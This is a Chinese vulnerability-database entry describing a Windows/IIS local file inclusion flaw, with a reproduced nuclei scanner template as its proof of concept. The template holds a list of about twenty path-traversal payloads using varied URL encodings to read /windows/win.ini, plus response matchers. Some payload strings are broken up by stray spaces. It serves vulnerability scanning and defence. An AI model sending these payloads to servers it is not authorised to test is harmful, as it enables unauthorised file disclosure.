漏洞信息 漏洞名称: Windows - Local File Inclusion
漏洞类型: 文件读取
漏洞等级: 高危
漏洞描述: 该漏洞涉及Windows操作系统中的本地文件包含(LFI)问题,主要由于系统在处理特定URL请求时,会搜索/windows/win.ini文件。这种漏洞允许攻击者通过构造特殊的URL路径,绕过正常的文件访问限制,读取系统上的敏感文件。Windows操作系统是全球使用最广泛的操作系统之一,广泛应用于个人电脑、服务器等多种场景。此漏洞的技术根源在于输入验证不足,未能正确过滤或限制用户提供的路径参数,导致攻击者可以利用路径遍历技术访问受限文件。这种漏洞可能导致敏感信息泄露,如系统配置、用户数据等,严重威胁系统安全。攻击者无需认证即可利用此漏洞,且可以自动化执行攻击,增加了漏洞的危险性。
产品厂商: Microsoft
产品名称: Windows
来源: https://github.com/projectdiscovery/nuclei-templates/blob/d694ffeb6baa526904249ded765790e5726c0b03/http%2Fvulnerabilities%2Fgeneric%2Fgeneric-windows-lfi.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 id: generic-windows-lfi info: name: Windows - Local File Inclusion author: mesaglio,sushantkamble,ritikchaddha severity: high description: | Windows is vulnerable to local file inclusion because of searches for /windows/win.ini on passed URLs. classification: cvss-metrics: CVSS:3.0 /AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: max-request: 23 tags: azure,windows,lfi,generic flow: http(1 ) && http(2 ) http: - method : GET path : - " {{BaseURL} }/" matchers: - type: word words: - " Windows" - " Microsoft" - " IIS" condition: or internal: true - method: GET - method: GET path: - " {{BaseURL} }{{paths} }" payloads: paths: - " /..0x5c ..0x5c ..0x5c ..0x5c ..0x5c ..0x5c ..0x5c ..0x5cwindows/win.ini" - " /./../../../../../../../../../../windows/win.ini" - " /.%252e /.%252e /.%252e /.%252e /.%252e /.%252e /.%252e /windows/win.ini" - " /.%5C%5C ./.%5C%5C ./.%5C%5C ./.%5C%5C ./.%5C%5C ./.%5C%5C ./windows/win.ini" - " /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows /win.ini" - " /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows /win.ini" - " /%c 0%ae%c 0%ae /%c 0%ae%c 0%ae /%c 0%ae%c 0%ae /%c 0%ae%c 0%ae /%c 0%ae%c 0%ae /%c 0%ae%c 0%ae /%c 0%ae%c 0%ae /%c 0%ae%c 0%ae /windows/win.ini" - " /?redirect=..%2f ..%2f ..%2f ..%2fwindows /win.ini" - " /?page=..%2f ..%2f ..%2f ..%2f ..%2fwindows /win.ini" - " /?url=..%2f ..%2f ..%2f ..%2f ..%2f ..%2fwindows /win.ini" - " /..//// // /../ // /../ // // /windows/ win.ini" - " /%5C ../%5C ../%5C ../%5C ../%5C ../%5C ../%5C ../%5C ../%5C ../%5C ../%5C ../windows/win.ini" - " /%c 0%ae%c 0%ae /%c 0%ae%c 0%ae /%c 0%ae%c 0%ae /windows/win.ini" - " /%c 0%ae%c 0%ae /%c 0%ae%c 0%ae /%c 0%ae%c 0%ae /windows/win.ini%00 " - " /index.php?page=windows/win.ini" - " /index.php?page=windows/win.ini%00 " - " /index.php?page=../../windows/win.ini" - " /index.php?page=....//....//windows/win.ini" - " /.%2e /%2e%2e /%2e%2e /%2e%2e /%2e%2e /%2e%2e /%2e%2e /windows/win.ini" - " /.%% 32 %65 /.%% 32 %65 /.%% 32 %65 /.%% 32 %65 /.%% 32 %65 /.%% 32 %65 /.%% 32 %65 /windows/win.ini" - " /../../../../../../../../../windows/win.ini" - " /%25 5c%255c ..%255c /..%255c /..%255c /..%255c /..%255c /..%255c /..%255c /..%255c /..%255c /windows/win.ini" stop-at-first-match: true matchers: - type: word part: body words: - " bit app support" - " fonts" - " extensions" condition: and # digest: 4a0a00473045022100b462767abf9531d8c6b99a271deb4c5d77e84037e508d3c901e6da13d08b6f0c022015d877706e3b3d94ffe600c194bb8c3cc66d30e7809ac108446cdeb9aa306829:922c64590222798bb761d5b6d8e72950